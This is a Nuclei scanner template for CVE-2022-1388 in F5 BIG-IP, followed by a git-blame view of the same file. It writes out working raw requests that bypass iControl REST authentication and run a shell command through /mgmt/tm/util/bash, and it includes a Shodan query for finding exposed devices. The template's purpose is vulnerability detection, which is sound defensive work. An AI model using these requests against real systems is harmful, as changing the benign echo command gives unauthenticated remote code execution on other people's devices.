nuclei-templates/cves/2022/CVE-2022-1388.yaml

id: CVE-2022-1388

info:
  name: F5 BIG-IP iControl - REST Auth Bypass RCE
  author: dwisiswant0,Ph33r
  severity: critical
  description: |
    F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication.
  reference:
    - https://twitter.com/GossiTheDog/status/1523566937414193153
    - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
    - https://support.f5.com/csp/article/K23605346
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1388
    cwe-id: CWE-306
  metadata:
    shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
    verified: "true"
  tags: f5,bigip,cve,cve2022,rce,mirai,kev

variables:
  auth: "admin:"
  cmd: "echo CVE-2022-1388 | rev"

requests:
  - raw:
      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json

        {
             "command": "run",
             "utilCmdArgs": "-c '{{cmd}}'"
        }

      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: localhost
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json

        {
             "command": "run",
             "utilCmdArgs": "-c '{{cmd}}'"
        }

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "commandResult"
          - "8831-2202-EVC"
        condition: and

# Enhanced by mp on 2022/05/19
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`id: CVE-2022-1388`

			`info:`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`name: F5 BIG-IP iControl - REST Auth Bypass RCE`
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`author: dwisiswant0,Ph33r`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00			`F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication.`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`reference:`
Update CVE-2022-1388.yaml 2022-05-09 08:40:31 +00:00			`- https://twitter.com/GossiTheDog/status/1523566937414193153`
Update CVE-2022-1388.yaml 2022-05-11 20:30:33 +00:00			`- https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`- https://support.f5.com/csp/article/K23605346`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388`
Auto Generated CVE annotations [Mon May 9 08:58:57 UTC 2022] :robot: 2022-05-09 08:58:57 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-score: 9.8`
Auto Generated CVE annotations [Mon May 9 08:58:57 UTC 2022] :robot: 2022-05-09 08:58:57 +00:00			`cve-id: CVE-2022-1388`
			`cwe-id: CWE-306`
misc update 2022-05-09 09:37:01 +00:00			`metadata:`
			`shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"`
Auto Generated CVE annotations [Fri May 20 21:49:49 UTC 2022] :robot: 2022-05-20 21:49:49 +00:00			`verified: "true"`
Updated "cisa" tags to "kev" + added tags to new applicable templates (#4871) 2022-07-21 17:18:22 +00:00			`tags: f5,bigip,cve,cve2022,rce,mirai,kev`
misc update 2022-05-09 09:37:01 +00:00
			`variables:`
			`auth: "admin:"`
using variables instead of payloads 2022-05-14 10:26:45 +00:00			`cmd: "echo CVE-2022-1388 \| rev"`
Update CVE-2022-1388.yaml 2022-05-09 08:36:32 +00:00
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`requests:`
			`- raw:`
Remove unnecessary + 2022-05-10 21:19:58 +00:00			`- \|`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`POST /mgmt/tm/util/bash HTTP/1.1`
			`Host: {{Hostname}}`
			`Connection: keep-alive, X-F5-Auth-Token`
			`X-F5-Auth-Token: a`
Update CVE-2022-1388.yaml 2022-05-09 08:36:32 +00:00			`Authorization: Basic {{base64(auth)}}`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`Content-Type: application/json`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`{`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`"command": "run",`
Update CVE-2022-1388.yaml 2022-05-11 20:29:55 +00:00			`"utilCmdArgs": "-c '{{cmd}}'"`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`}`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`- \|`
			`POST /mgmt/tm/util/bash HTTP/1.1`
			`Host: localhost`
			`Connection: keep-alive, X-F5-Auth-Token`
			`X-F5-Auth-Token: a`
			`Authorization: Basic {{base64(auth)}}`
			`Content-Type: application/json`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`{`
Update CVE-2022-1388.yaml 2022-05-11 20:29:55 +00:00			`"command": "run",`
			`"utilCmdArgs": "-c '{{cmd}}'"`
Update CVE-2022-1388.yaml 2022-05-09 13:57:14 +00:00			`}`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00
Update CVE-2022-1388.yaml 2022-05-11 20:29:55 +00:00			`stop-at-first-match: true`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`matchers-condition: and`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`matchers:`
			`- type: word`
Update CVE-2022-1388.yaml 2022-05-11 20:29:55 +00:00			`part: body`
Add CVE-2022-1388 2022-05-09 07:53:05 +00:00			`words:`
Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes. 2022-05-10 21:07:09 +00:00			`- "commandResult"`
Update CVE-2022-1388.yaml 2022-05-11 20:29:55 +00:00			`- "8831-2202-EVC"`
			`condition: and`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00
			`# Enhanced by mp on 2022/05/19`